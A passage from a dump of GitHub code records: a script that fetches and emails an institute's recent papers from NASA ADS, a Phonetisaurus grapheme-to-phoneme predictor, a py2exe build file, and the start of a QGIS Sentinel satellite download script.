l=hep-ph&arxiv_sel=hep-th&arxiv_sel=math&arxiv_sel=math-ph&arxiv_sel=nlin&ar\n xiv_sel=nucl-ex&arxiv_sel=nucl-th&arxiv_sel=physics&arxiv_sel=quant-ph&arxiv\n _sel=q-bio&sim_query=YES&ned_query=YES&adsobj_query=YES&aut_logic=OR&obj_log\n ic=OR&author=&object=&start_mon=%i&start_year=%i&end_mon=%i&end_year=%i&ttl_\n logic=OR&title=&txt_logic=OR&text=&kwd_logic=OR&keyword=&aff_req=YES&aff_log\n ic=OR&affiliation=%s&nr_to_return=200&start_nr=1&jou_pick=NO&ref_stems=&data\n _and=ALL&group_and=ALL&start_entry_day=&start_entry_mon=&start_entry_year=&e\n 
nd_entry_day=&end_entry_mon=&end_entry_year=&min_score=&sort=SCORE&data_type\n =SHORT&aut_syn=YES&txt_syn=YES&txt_syn=YES&aut_wt=1.0&obj_wt=1.0&ttl_wt=0.3&\n txt_wt=3.0&aut_wgt=YES&obj_wgt=YES&ttl_wgt=YES&txt_wgt=YES&ttl_sco=YES&txt_s\n co=YES&version=1&aff_syn=NO&aff_wt=1.0&aff_wgt=YES&kwd_sco=YES&kwd_syn=NO&kw\n d_wt=1.0&kwd_wgt=YES&kwd_sco=YES\"\"\".replace('\\n ', '') \\\n % (start_month, start_year, end_month, end_year, affiliation, )\n \n host = 'http://adsabs.harvard.edu/cgi-bin/nph-abs_connect?' + data\n \n # Perform the query\n request = urllib2.Request(host)\n handle = urllib2.urlopen(request, timeout=timeout)\n data = ''.join(handle.read())\n \n # Search for pre-prints and article links\n \n preprints = re.findall('href=\"\\S+link_type=PREPRINT\"', data)\n articles = re.findall('href=\"\\S+link_type=ARTICLE\"', data)\n \n logging.info(\"Identified %i preprint links and %i article links.\" \\\n % (len(preprints), len(articles), ))\n \n if len(preprints) > len(articles):\n logging.info(\"Preprint links will be used wherever refereed article files are unavailable.\")\n \n # Clean up the links\n preprints = [preprint.split('\"')[1] for preprint in preprints]\n articles = [article.split('\"')[1] for article in articles]\n \n logging.debug(\"Pre-prints:\")\n [logging.debug(preprint) for preprint in preprints]\n \n logging.debug(\"Article links:\")\n [logging.debug(article) for article in articles]\n \n \n article_baselinks = [';'.join(article.split(';')[:-1]) for article in articles]\n \n article_urls = []\n \n # Check for any papers that have preprints but no full refereed journal article\n for preprint in preprints:\n link = ';'.join(preprint.split(';')[:-1])\n \n if link not in article_baselinks:\n # This particular paper had no full PDF link, so we will have to take\n # the pre-print\n article_urls.append(preprint)\n \n else:\n # This will maintain chronological order of all the articles\n article_urls.append(articles[article_baselinks.index(link)])\n \n # Clean up the links [TODO] make this more elegant\n article_urls = [article.replace('&', '&') for article in article_urls] \n \n # Extract bibcodes\n bibcodes = []\n for article in article_urls:\n bibcode = re.findall('(?<=bibcode=)\\S+(?=&db_key)', article)\n \n if len(bibcode) is 0:\n logging.warn(\"Could not find bibliography code from URL (%s).\" \\\n + \"Assigning random string instead.\" % (article, ))\n bibcode = ''\n else: bibcode = bibcode[0].replace('%26', '&') # TODO be more elegant\n \n bibcodes.append(bibcode)\n \n \n return zip(bibcodes, article_urls)\n \n\n\n\ndef download_article(article_url, output, clobber=True, timeout=120):\n \"\"\"Retrieves an article or pre-print PDF from ADS and saves it to disk.\n \n Inputs\n ----\n article_url : str\n The URL of the article to retrieve.\n \n output : str\n Output filename to save the article to.\n \n clobber : bool, optional\n Whether to overwrite the file if the filename already exists.\n \n timout : int, optional\n Amount of seconds to wait before timing out the socket connection.\n \n Raises\n ----\n ValueError\n If an article URL is not from NASA ADS.\n \n IOError\n If the filename provided exists but we've been told not to clobber it.\n \"\"\"\n\n if not article_url.startswith('http://adsabs.harvard.edu'):\n raise ValueError('Expected an article URL that from ADS, but the URL ' \\\n + 'did not start with http://adsabs.harvard.edu: \"%s\"' \\\n % (article_url, ))\n \n if os.path.exists(output) and not clobber:\n raise IOError('Filename exists (%s) and we will not 
clobber it.' \\\n % (article_url, ))\n \n logging.info(\"Attempting to download article from %s\" % (article_url, ))\n \n request = urllib2.Request(article_url)\n handle = urllib2.urlopen(request, timeout=timeout)\n \n \n if handle.geturl().startswith('http://arXiv.org/'):\n # This is a pre-print URL, so we actually need to rget the real PDF\n real_article_url = handle.geturl().replace('/abs/', '/pdf/')\n logging.info(\"This article is a preprint, so we are taking it from %s instead\" \\\n % (real_article_url, ))\n \n request = urllib2.Request(real_article_url)\n handle = urllib2.urlopen(request, timeout=timeout)\n \n elif handle.geturl().startswith('http://onlinelibrary.wiley.com'):\n # Wiley has this annoying frame that we need to navigate through.\n \n data = handle.read()\n \n real_article_url = re.findall('iframe id=\"pdfDocument\" src=\".+\" width=\"100%\"', data)[0].split('src=\"')[1].split('\" width=\"100%\"')[0]\n logging.info(\"This article is through Wiley which uses an internal frame to display PDF files, so we are following through to %s\" % (real_article_url, ))\n \n request = urllib2.Request(real_article_url)\n handle = urllib2.urlopen(request, timeout=timeout)\n \n data = handle.read()\n \n pdf_file = open(output, 'wb')\n pdf_file.write(data)\n pdf_file.close()\n \n logging.info(\"Article saved to %s\" % (output, ))\n \n return output\n\n\ndef summarise_articles(articles, output, clobber=True):\n \"\"\"Collects the first page from all the article filenames provided and puts\n them into a single PDF file.\n \n Inputs\n ----\n articles : list of str\n A list of PDF filenames to generate the summary file from.\n \n output : str\n Output filename for the summary file.\n \n clobber : bool, optional\n Whether to overwrite the output file if the filename already exists.\n \n Raises\n ----\n IOError\n If the output filename provided exists but we've been told not to clobber it.\n \"\"\"\n \n if os.path.exists(output) and not clobber:\n raise IOError(\"Output file name exists (%s) and we've been told not to clobber it.\" % (output, ))\n \n output_pdf = PdfFileWriter()\n \n article_fps = []\n for article in articles:\n # Open the article\n article_fp = open(article, \"rb\")\n article_pdf = PdfFileReader(article_fp)\n \n # Add the first page to our summary PDF\n output_pdf.addPage(article_pdf.getPage(0))\n article_fps.append(article_fp)\n \n # Save the final PDF\n output_fp = open(output, 'wb')\n output_pdf.write(output_fp)\n output_fp.close()\n \n [article_fp.close() for article_fp in article_fps]\n \n return True\n\n\ndef email_article_summary(to_address, summary_filename, start_year, start_month, end_year, end_month, num_articles):\n \"\"\"Emails a summary file to the given address, with brief information about\n the number of articles published institute authors in a given time period.\n \n Inputs\n ----\n to_address : str\n E-mail address to send the article summary to.\n \n summary_filename : str\n Filename where the output summary file is saved to.\n \n start_year : int\n Year to start searching for article from, e.g. 
2012\n \n start_month : int\n Month to start searching for articles from, between 1-12.\n \n end_year : int\n Inclusive year to stop searching for articles from.\n \n end_month : int\n Inclusive month to stop searching for articles from.\n \n num_articles : int\n Number of articles found in the given month.\n \n Notes\n ----\n start_year, start_month, end_year, end_month, and num_articles are required\n for the email body because this information cannot be deduced from the\n summary_filename PDF.\n \n Raises\n ----\n Exception\n If there was some problem sending the email.\n \"\"\"\n \n host = HOST\n from_address = FROM_ADDRESS\n body = \"\"\"\n Good morning,\n \n There were %i peer-reviewed papers produced by researchers at this institute between %i/%i and %i/%i. A summary file containing the front page from each article is attached with this email. Please print out these summary pages, highlight the author(s) on each article and pin them to the monthly papers noticeboard.\n \n Thanks a bunch,\n \n Skynet.\n \n \"\"\" % (num_articles, start_month, start_year, end_month, end_year, )\n \n recipients = [to_address, ADMIN_ADDRESS]\n \n logging.info(\"Preparing summary email report for %s\" % (', '.join(recipients), ))\n \n successful = True\n for recipient in recipients:\n \n message = MIMEMultipart()\n message[\"From\"] = from_address\n message[\"To\"] = recipient\n message[\"Subject\"] = \"Refereed papers summary between %i/%i and %i/%i\" % (start_month, start_year, end_month, end_year, )\n message[\"Date\"] = formatdate(localtime=True)\n \n message.attach(MIMEText(textwrap.dedent(body).lstrip()))\n \n part = MIMEBase('application', 'octet-stream')\n part.set_payload(open(summary_filename, 'rb').read())\n Encoders.encode_base64(part)\n part.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % os.path.basename(summary_filename))\n message.attach(part)\n \n server = smtplib.SMTP(host)\n \n try:\n failed = server.sendmail(from_address, to_address, message.as_string())\n server.close()\n \n except Exception as e:\n logging.critical(\"Unable to send email to %s. Error: %s\" % (recipient, str(e), ))\n successful = False\n \n else:\n logging.info(\"Email successfully sent to %s\" % recipient)\n \n \n return successful\n \n\ndef report_monthly_papers(email_address, start_year, start_month, end_year, end_month, timeout):\n \"\"\"Retrieves all peer-reviewed papers authored or co-authored by researchers\n at a given institute in a given time frame, and emails a paperboy/girl the\n first page of each peer-reviewed article.\n \n Inputs\n ----\n email_address : str\n E-mail to send the montly report to.\n \n start_year : int\n Year to start searching for articles from.\n \n start_month : int\n Month to start searching for articles from, e.g. 
1-12\n \n end_year : int\n Inclusive month to stop searching for articles from.\n \n end_month : int\n Inclusive month to stop searching for articles from.\n \n timeout : int\n Number of seconds to wait before timing out the article retrival socket.\n \n Returns\n ----\n None\n \"\"\"\n \n start_year = int(start_year)\n start_month = int(start_month)\n \n if end_year is None:\n end_year = start_year if 12 > start_month else start_year + 1\n else:\n end_year = int(end_year)\n \n if end_month is None:\n end_month = start_month + 1 if 12 > start_month else 1\n else:\n end_month = int(end_month)\n \n folder = os.path.join(os.path.dirname(__file__), '%s-%s_%s-%s' \\\n % (start_year, start_month, end_year, end_month, ))\n if not os.path.exists(folder):\n os.system('mkdir %s' % (folder, )) \n \n article_list = retrieve_article_urls(start_year, start_month, end_year=end_year, end_month=end_month, timeout=timeout)\n saved_articles = [download_article(article, '%s/%s.pdf' % (folder, bibcode, )) for bibcode, article in article_list]\n summarise_articles(saved_articles, '%s/summary.pdf' % (folder, ))\n\n email_article_summary(email_address, '%s/summary.pdf' % (folder, ), start_year, start_month, end_year, end_month, len(article_list))\n\n\n\nif __name__ == '__main__':\n \n import argparse\n \n class LastMonthAction(argparse.Action):\n def __init__(self,\n option_strings,\n dest,\n nargs=None,\n const=None,\n default=None,\n type=None,\n choices=None,\n required=False,\n help=None,\n metavar=None):\n argparse.Action.__init__(self,\n option_strings=option_strings,\n dest=dest,\n nargs=nargs,\n const=const,\n default=default,\n type=type,\n choices=choices,\n required=required,\n help=help,\n metavar=metavar,\n )\n return\n \n def __call__(self, parser, namespace, values, option_string=None):\n \n if values == \"last\":\n now = datetime.now()\n month = now.month - 1\n year = now.year if now.month != 12 else now.year - 1\n \n setattr(namespace, 'end_month', month)\n setattr(namespace, 'end_year', year)\n \n elif values == \"this\":\n now = datetime.now()\n month, year = now.month, now.year\n \n \n setattr(namespace, self.dest, month)\n setattr(namespace, 'start_year', year)\n \n \n \n \n parser = argparse.ArgumentParser(prog=\"python paperboy.py\", description=\"Retrieves recent peer-reviewed articles published by institute staff and emails a summary report.\\n\\nExample: python paperboy.py --to my@email.com --month last\")\n \n #paperboy --month= --year= --to\n #month can be last, and then year is not necessary\n # end_year, end_month availabile\n \n parser.add_argument('--month', action=LastMonthAction, dest='start_month')\n parser.add_argument('--year', action='store', dest='start_year', type=int)\n \n parser.add_argument('--to', action='store', dest='to_address', type=str, default=None)\n parser.add_argument('--end_month', action='store', dest='end_month', type=int, default=None)\n parser.add_argument('--end_year', action='store', dest='end_year', type=int, default=None)\n parser.add_argument('--timeout', action='store', dest='timeout', type=int, default=120)\n parser.add_argument('--repeats', action='store', dest='repeats', type=int, default=3)\n parser.add_argument('--interval', action='store', dest='interval', type=int, default=120)\n \n results = parser.parse_args()\n \n if None not in [results.to_address, results.start_year, results.start_month]:\n \n for attempt in xrange(results.repeats):\n \n try:\n report_monthly_papers(results.to_address, results.start_year, results.start_month, 
results.end_year, results.end_month, results.timeout)\n \n except:\n etype, value, tb = sys.exc_info()\n logging.critical(\"An error occurred whilst trying to report the monthly papers:\\n\\tTraceback (most recent call last):\\n%s\\n\\t%s: %s\" \n % (\"\\n\".join(traceback.format_tb(tb, 5)), etype, value))\n logging.info(\"We will try again in %i seconds (%i attempts remaining).\" % (results.interval, results.repeats - attempt - 1, ))\n time.sleep(results.interval)\n \n else:\n logging.info(\"Finished successfully.\")\n break\n \n \n \n \n","repo_name":"andycasey/paperboy","sub_path":"paperboy.py","file_name":"paperboy.py","file_ext":"py","file_size_in_byte":19127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32957401474","text":"#!/usr/bin/env python3\n\"\"\"Guess word pronunciations using a Phonetisaurus FST\n\nSee bin/fst2npz.py to convert an FST to a numpy graph.\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport sys\nimport time\nimport typing\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport numpy as np\n\n_LOGGER = logging.getLogger(\"g2p_phonetisaurus\")\n\nNUMPY_GRAPH = typing.Dict[str, np.ndarray]\n\n# -----------------------------------------------------------------------------\n\n\ndef main():\n \"\"\"Main entry point\"\"\"\n parser = argparse.ArgumentParser(prog=\"g2p_phonetisaurus\")\n\n # Create subparsers for each sub-command\n sub_parsers = parser.add_subparsers()\n sub_parsers.required = True\n sub_parsers.dest = \"command\"\n\n # -------\n # Predict\n # -------\n predict_parser = sub_parsers.add_parser(\n \"predict\", help=\"Predict phonemes for word(s)\"\n )\n predict_parser.add_argument(\n \"--graph\", required=True, help=\"Path to graph npz file from fst2npy.py\"\n )\n predict_parser.add_argument(\n \"words\", nargs=\"*\", help=\"Words to guess pronunciations for\"\n )\n predict_parser.add_argument(\n \"--max-guesses\",\n default=1,\n type=int,\n help=\"Maximum number of guesses per word (default: 1)\",\n )\n predict_parser.add_argument(\n \"--beam\",\n default=500,\n type=int,\n help=\"Initial width of search beam (default: 500)\",\n )\n predict_parser.add_argument(\n \"--min-beam\",\n default=100,\n type=int,\n help=\"Minimum width of search beam (default: 100)\",\n )\n predict_parser.add_argument(\n \"--beam-scale\",\n default=0.6,\n type=float,\n help=\"Scalar multiplied by beam after each step (default: 0.6)\",\n )\n predict_parser.add_argument(\n \"--grapheme-separator\",\n default=\"\",\n help=\"Separator between input graphemes (default: none)\",\n )\n predict_parser.add_argument(\n \"--phoneme-separator\",\n default=\" \",\n help=\"Separator between output phonemes (default: space)\",\n )\n predict_parser.add_argument(\n \"--preload-graph\",\n action=\"store_true\",\n help=\"Preload graph into memory before starting\",\n )\n predict_parser.set_defaults(func=do_predict)\n\n # ----\n # Test\n # ----\n test_parser = sub_parsers.add_parser(\"test\", help=\"Test G2P model on a lexicon\")\n test_parser.add_argument(\n \"--graph\", required=True, help=\"Path to graph npz file from fst2npy.py\"\n )\n test_parser.add_argument(\n \"texts\", nargs=\"*\", help=\"Lines with ' ...'\"\n )\n test_parser.add_argument(\n \"--beam\",\n default=500,\n type=int,\n help=\"Initial width of search beam (default: 500)\",\n )\n test_parser.add_argument(\n \"--min-beam\",\n default=100,\n type=int,\n help=\"Minimum width of search beam (default: 100)\",\n )\n test_parser.add_argument(\n 
\"--beam-scale\",\n default=0.6,\n type=float,\n help=\"Scalar multiplied by beam after each step (default: 0.6)\",\n )\n test_parser.add_argument(\n \"--preload-graph\",\n action=\"store_true\",\n help=\"Preload graph into memory before starting\",\n )\n test_parser.set_defaults(func=do_test)\n\n # ----------------\n # Shared arguments\n # ----------------\n for sub_parser in [predict_parser, test_parser]:\n sub_parser.add_argument(\n \"--debug\", action=\"store_true\", help=\"Print DEBUG messages to console\"\n )\n\n args = parser.parse_args()\n\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n _LOGGER.debug(args)\n\n args.func(args)\n\n\n# -----------------------------------------------------------------------------\n\n\ndef do_predict(args):\n \"\"\"Predict phonemes for words\"\"\"\n args.graph = Path(args.graph)\n\n _LOGGER.debug(\"Loading graph from %s\", args.graph)\n phon_graph = PhonetisaurusGraph.load(args.graph, preload=args.preload_graph)\n\n if args.words:\n # Arguments\n words = args.words\n _LOGGER.info(\"Guessing pronunciations for %s word(s)\", len(words))\n else:\n # Standard input\n words = sys.stdin\n\n if os.isatty(sys.stdin.fileno()):\n print(\"Reading words from stdin...\", file=sys.stderr)\n\n # Guess pronunciations\n for word, graphemes, phonemes in phon_graph.g2p(\n words,\n grapheme_separator=args.grapheme_separator,\n max_guesses=args.max_guesses,\n beam=args.beam,\n min_beam=args.min_beam,\n beam_scale=args.beam_scale,\n ):\n if not phonemes:\n _LOGGER.warning(\"No pronunciation for %s (%s)\", word, graphemes)\n continue\n\n print(word, args.phoneme_separator.join(phonemes))\n\n\n# -----------------------------------------------------------------------------\n\n\ndef do_test(args):\n \"\"\"Test performance relative a known lexicon\"\"\"\n try:\n from rapidfuzz.distance.Levenshtein import distance as levenshtein\n except ImportError as e:\n _LOGGER.critical(\"rapidfuzz library is needed for levenshtein distance\")\n _LOGGER.critical(\"pip install 'rapidfuzz>=2.11.1'\")\n raise e\n\n args.graph = Path(args.graph)\n\n _LOGGER.debug(\"Loading graph from %s\", args.graph)\n phon_graph = PhonetisaurusGraph.load(args.graph, preload=args.preload_graph)\n\n if args.texts:\n lines = args.texts\n else:\n lines = sys.stdin\n\n if os.isatty(sys.stdin.fileno()):\n print(\"Reading lexicon lines from stdin...\", file=sys.stderr)\n\n # Load lexicon\n lexicon = {}\n for line in lines:\n line = line.strip()\n if (not line) or (\" \" not in line):\n continue\n\n word, actual_phonemes = line.split(maxsplit=1)\n lexicon[word] = actual_phonemes\n\n # Predict phonemes\n predicted_phonemes = {}\n start_time = time.perf_counter()\n\n for word in lexicon:\n for _, _, guessed_phonemes in phon_graph.g2p(\n [word],\n beam=args.beam,\n min_beam=args.min_beam,\n beam_scale=args.beam_scale,\n max_guesses=1,\n ):\n predicted_phonemes[word] = \" \".join(guessed_phonemes)\n\n # Only one guess\n break\n\n end_time = time.perf_counter()\n\n # Calculate PER\n num_errors = 0\n num_missing = 0\n num_phonemes = 0\n\n for word, actual_phonemes in lexicon.items():\n expected_phonemes = predicted_phonemes.get(word, \"\")\n\n if expected_phonemes:\n distance = levenshtein(expected_phonemes, actual_phonemes)\n num_errors += distance\n num_phonemes += len(actual_phonemes)\n else:\n num_missing += 1\n _LOGGER.warning(\"No pronunciation for %s\", word)\n\n assert num_phonemes > 0, \"No phonemes were read\"\n\n # Calculate results\n per = 
round(num_errors / num_phonemes, 2)\n wps = round(len(predicted_phonemes) / (end_time - start_time), 2)\n print(\"PER:\", per, \"Errors:\", num_errors, \"words/sec:\", wps)\n\n if num_missing > 0:\n print(\"Total missing:\", num_missing)\n\n\n# -----------------------------------------------------------------------------\n\n_NOT_FINAL = object()\n\n\nclass PhonetisaurusGraph:\n \"\"\"Graph of numpy arrays that represents a Phonetisaurus FST\n\n Also contains shared cache of edges and final state probabilities.\n These caches are necessary to ensure that the .npz file stays small and fast\n to load.\n \"\"\"\n\n def __init__(self, graph: NUMPY_GRAPH, preload: bool = False):\n self.graph = graph\n\n self.start_node = int(self.graph[\"start_node\"].item())\n\n # edge_index -> (from_node, to_node, ilabel, olabel)\n self.edges = self.graph[\"edges\"]\n self.edge_probs = self.graph[\"edge_probs\"]\n\n # int -> [str]\n self.symbols = []\n for symbol_str in self.graph[\"symbols\"]:\n symbol_list = symbol_str.replace(\"_\", \"\").split(\"|\")\n self.symbols.append((len(symbol_list), symbol_list))\n\n # nodes that are accepting states\n self.final_nodes = self.graph[\"final_nodes\"]\n\n # node -> probability\n self.final_probs = self.graph[\"final_probs\"]\n\n # Cache\n self.preloaded = preload\n self.out_edges: typing.Dict[int, typing.List[int]] = defaultdict(list)\n self.final_node_probs: typing.Dict[int, typing.Any] = {}\n\n if preload:\n # Load out edges\n for edge_idx, (from_node, *_) in enumerate(self.edges):\n self.out_edges[from_node].append(edge_idx)\n\n # Load final probabilities\n self.final_node_probs.update(zip(self.final_nodes, self.final_probs))\n\n @staticmethod\n def load(graph_path: typing.Union[str, Path], **kwargs) -> \"PhonetisaurusGraph\":\n \"\"\"Load .npz file with numpy graph\"\"\"\n np_graph = np.load(graph_path, allow_pickle=True)\n return PhonetisaurusGraph(np_graph, **kwargs)\n\n def g2p(\n self, words: typing.Iterable[typing.Union[str, typing.Sequence[str]]], **kwargs\n ) -> typing.Iterable[\n typing.Tuple[\n typing.Union[str, typing.Sequence[str]],\n typing.Sequence[str],\n typing.Sequence[str],\n ],\n ]:\n \"\"\"Guess phonemes for words\"\"\"\n for word in words:\n for graphemes, phonemes in self.g2p_one(word, **kwargs):\n yield word, graphemes, phonemes\n\n def g2p_one(\n self,\n word: typing.Union[str, typing.Sequence[str]],\n eps: str = \"\",\n beam: int = 5000,\n min_beam: int = 100,\n beam_scale: float = 0.6,\n grapheme_separator: str = \"\",\n max_guesses: int = 1,\n ) -> typing.Iterable[typing.Tuple[typing.Sequence[str], typing.Sequence[str]]]:\n \"\"\"Guess phonemes for word\"\"\"\n current_beam = beam\n graphemes: typing.Sequence[str] = []\n\n if isinstance(word, str):\n word = word.strip()\n\n if grapheme_separator:\n graphemes = word.split(grapheme_separator)\n else:\n graphemes = list(word)\n else:\n graphemes = word\n\n if not graphemes:\n return graphemes, []\n\n # (prob, node, graphemes, phonemes, final, beam)\n q: typing.List[\n typing.Tuple[\n float,\n typing.Optional[int],\n typing.Sequence[str],\n typing.List[str],\n bool,\n ]\n ] = [(0.0, self.start_node, graphemes, [], False)]\n\n q_next: typing.List[\n typing.Tuple[\n float,\n typing.Optional[int],\n typing.Sequence[str],\n typing.List[str],\n bool,\n ]\n ] = []\n\n # (prob, phonemes)\n best_heap: typing.List[typing.Tuple[float, typing.Sequence[str]]] = []\n\n # Avoid duplicate guesses\n guessed_phonemes: typing.Set[typing.Tuple[str, ...]] = set()\n\n while q:\n done_with_word = False\n q_next = 
[]\n\n for prob, node, next_graphemes, output, is_final in q:\n if is_final:\n # Complete guess\n phonemes = tuple(output)\n if phonemes not in guessed_phonemes:\n best_heap.append((prob, phonemes))\n guessed_phonemes.add(phonemes)\n\n if len(best_heap) >= max_guesses:\n done_with_word = True\n break\n\n continue\n\n assert node is not None\n\n if not next_graphemes:\n if self.preloaded:\n final_prob = self.final_node_probs.get(node, _NOT_FINAL)\n else:\n final_prob = self.final_node_probs.get(node)\n if final_prob is None:\n final_idx = int(np.searchsorted(self.final_nodes, node))\n if self.final_nodes[final_idx] == node:\n # Cache\n final_prob = float(self.final_probs[final_idx])\n self.final_node_probs[node] = final_prob\n else:\n # Not a final state\n final_prob = _NOT_FINAL\n self.final_node_probs[node] = final_prob\n\n if final_prob != _NOT_FINAL:\n final_prob = typing.cast(float, final_prob)\n q_next.append((prob + final_prob, None, [], output, True))\n\n len_next_graphemes = len(next_graphemes)\n if self.preloaded:\n # Was pre-loaded in __init__\n edge_idxs = self.out_edges[node]\n else:\n # Build cache during search\n maybe_edge_idxs = self.out_edges.get(node)\n if maybe_edge_idxs is None:\n edge_idx = int(np.searchsorted(self.edges[:, 0], node))\n edge_idxs = []\n while self.edges[edge_idx][0] == node:\n edge_idxs.append(edge_idx)\n edge_idx += 1\n\n # Cache\n self.out_edges[node] = edge_idxs\n else:\n edge_idxs = maybe_edge_idxs\n\n for edge_idx in edge_idxs:\n _, to_node, ilabel_idx, olabel_idx = self.edges[edge_idx]\n out_prob = self.edge_probs[edge_idx]\n\n len_igraphemes, igraphemes = self.symbols[ilabel_idx]\n\n if len_igraphemes > len_next_graphemes:\n continue\n\n if igraphemes == [eps]:\n item = (prob + out_prob, to_node, next_graphemes, output, False)\n q_next.append(item)\n else:\n sub_graphemes = next_graphemes[:len_igraphemes]\n if igraphemes == sub_graphemes:\n _, olabel = self.symbols[olabel_idx]\n item = (\n prob + out_prob,\n to_node,\n next_graphemes[len(sub_graphemes) :],\n output + olabel,\n False,\n )\n q_next.append(item)\n\n if done_with_word:\n break\n\n q_next = sorted(q_next, key=lambda item: item[0])[:current_beam]\n q = q_next\n\n current_beam = max(min_beam, (int(current_beam * beam_scale)))\n\n # Yield guesses\n if best_heap:\n for _, guess_phonemes in sorted(best_heap, key=lambda item: item[0])[\n :max_guesses\n ]:\n yield graphemes, [p for p in guess_phonemes if p]\n else:\n # No guesses\n yield graphemes, []\n\n\n# -----------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rhasspy/gruut","sub_path":"gruut/g2p_phonetisaurus.py","file_name":"g2p_phonetisaurus.py","file_ext":"py","file_size_in_byte":15377,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"2"} +{"seq_id":"30841713782","text":"# coding: utf-8\n\nfrom distutils.core import setup\nimport py2exe\n\nOPTIONS = [\n {\n \"script\": \"printsrv_exe.py\",\n \"dest_base\": \"printsrv\"\n }]\n\nsetup(\n options = {'py2exe': {'bundle_files': 1}},\n zipfile = None,\n console = OPTIONS\n)\n\n# run\n# build_printsrv_exe.py py2exe\n","repo_name":"Piletilevi/printsrv-lit","sub_path":"build_printsrv_exe.py","file_name":"build_printsrv_exe.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21813855975","text":"#Definition of inputs and 
outputs\n#==================================\n##Sentinel Download=group\n##Download Sentinel=name\n##ParameterString|USER|Username|\n##ParameterString|PASSWORD|Password|\n##ParameterString|START|Start date (YYYYMMDD)|NOW-1DAY|False|True\n##ParameterString|END|End date (YYYYMMDD)|NOW|False|True\n##ParameterSelection|SENTINEL|Sentinel satellite constellation|any;1;2;3|0\n##ParameterExtent|EXTENT|Area of interest extent (geographic coordinates)||True\n##ParameterFile|GEOMETRY_SHP|Area of interest .shp file (geographic coordinates - WGS84)|False|True|shp\n##ParameterFile|GEOMETRY_GJ|Area of interest .geojson file|False|True|geojson\n##ParameterNumber|CLOUD|Maximum cloud cover in percent|0|100|0|True\n##*ParameterSelection|INSTRUMENT|Instrument|any;MSI;SAR-CSAR;SLSTR;OLCI;SRAL|0\n##*ParameterSelection|PRODUCTTYPE|Product type|any;SLC;GRD;OCN;RAW;S2MSI1C;S2MSI2Ap|0\n##*ParameterString|UUID|Select products by UUID (comma-separated)||False|True\n##*ParameterString|NAME|Select products by filename (supports wildcards)||False|True\n##*ParameterString|QUERY|Extra search keywords. Example: 'producttype=GRD,polarisationmode=HH'||False|True\n##*ParameterString|URL|DHuS URL|https://scihub.copernicus.eu/apihub/|False|True\n##ParameterNumber|LIMIT|Maximum number of products|0|100000|0|True\n##ParameterBoolean|DOWNLOAD|Download all results of the query|False\n##ParameterBoolean|FOOTPRINTS|Create geojson file search_footprints.geojson with footprints and metadata|False\n##OutputDirectory|PATH|Set the path where the the files will be saved\nimport os\nimport logging\n\nlogger = logging.getLogger('sentinelsat')\n\nlogger_set = False # only set once\n\n_PROGRESS = progress # from magic qgis namespace\n\n\ndef _extent_from_shpfile(path):\n import ogr\n drv = ogr.GetDriverByName('ESRI Shapefile')\n ds = drv.Open(path)\n if ds is None:\n raise IOError('Reading {} failed.'.format(path))\n try:\n layer = ds.GetLayer()\n extent = layer.GetExtent()\n extent_str = str(extent)[1:-1].replace(' ', '')\n finally:\n ds.Destroy()\n return extent_str\n\n\ndef _extent_to_wkt(extent_str):\n return (\n 'POLYGON(({0} {2},{1} {2},{1} {3},{0} {3},{0} {2}))'\n .format(*extent_str.split(',')))\n\n\nif GEOMETRY_SHP:\n EXTENT = _extent_from_shpfile(GEOMETRY_SHP)\n\n\nkwargs = dict(\n start=START or None,\n end=END or None,\n area_wkt=_extent_to_wkt(EXTENT) if EXTENT else None,\n geometry=GEOMETRY_GJ or None,\n user=USER,\n password=PASSWORD,\n url=URL,\n uuid=UUID or None,\n name=NAME or None,\n sentinel=[None, '1', '2', '3'][SENTINEL],\n instrument=[None, 'MSI', 'SAR-C SAR', 'SLSTR', 'OLCI', 'SRAL'][INSTRUMENT],\n producttype=[None, 'SLC', 'GRD', 'OCN', 'RAW', 'S2MSI1C', 'S2MSI2Ap'][PRODUCTTYPE],\n cloud=CLOUD or None,\n query=QUERY or None,\n limit=LIMIT or None,\n download=DOWNLOAD,\n path=PATH,\n footprints=FOOTPRINTS)\n\n\nclass ProgressHandler(logging.StreamHandler):\n\n def __init__(self, progress):\n super(self.__class__, self).__init__()\n self.progress = progress\n\n def emit(self, record):\n msg = self.format(record)\n try:\n self.progress.setConsoleInfo(msg)\n except RuntimeError:\n pass # no logging\n\n\nclass ProgressBar(object):\n\n def __init__(self, total, initial=0.0, *args, **kwargs):\n self.qgis_progress = _PROGRESS\n self.value = initial\n self.total = total\n self.qgis_progress.setPercentage(self._get_percent())\n\n def _get_percent(self):\n return float(self.value) / self.total * 100\n\n def update(self, increment):\n self.value += increment\n self.qgis_progress.setPercentage(self._get_percent())\n\n def 
close(self):\n pass\n\n\ndef _set_logger_handler(qgis_progress, level='INFO'):\n global logger_set\n if logger_set:\n return\n logger.setLevel(level)\n h = ProgressHandler(qgis_progress)\n h.setLevel(level)\n fmt = logging.Formatter('%(message)s')\n h.setFormatter(fmt)\n logger.addHandler(h)\n logger_set = True\n\n\ndef _load_to_canvas(path):\n if path is not None and os.path.isfile(path):\n from processing.tools import dataobjects\n dataobjects.load(path, os.path.basename(path))\n\n\ndef cli(user, password, geometry, start, end, uuid, name, download, sentinel, producttype,\n instrument, cloud, footprints, path, query, url, limit,\n area_wkt,\n order_by=None):\n \"\"\"Search for Sentinel products and, optionally, download all the results\n and/or create a geojson file with the search result footprints.\n Beyond your Copernicus Open Access Hub user and password, you must pass a geojson file\n containing the geometry of the area you want to search for or the UUIDs of the products. If you\n don't specify the start and end dates, it will search in the last 24 hours.\n \"\"\"\n import geojson as gj\n from sentinelsat.sentinel import SentinelAPI, SentinelAPIError, geojson_to_wkt, read_geojson\n\n returns = {} # information to return\n\n api = SentinelAPI(user, password, url)\n api._tqdm = ProgressBar\n\n search_kwargs = {}\n if sentinel and not (producttype or instrument):\n search_kwargs[\"platformname\"] = \"Sentinel-\" + sentinel\n\n if instrument and not producttype:\n 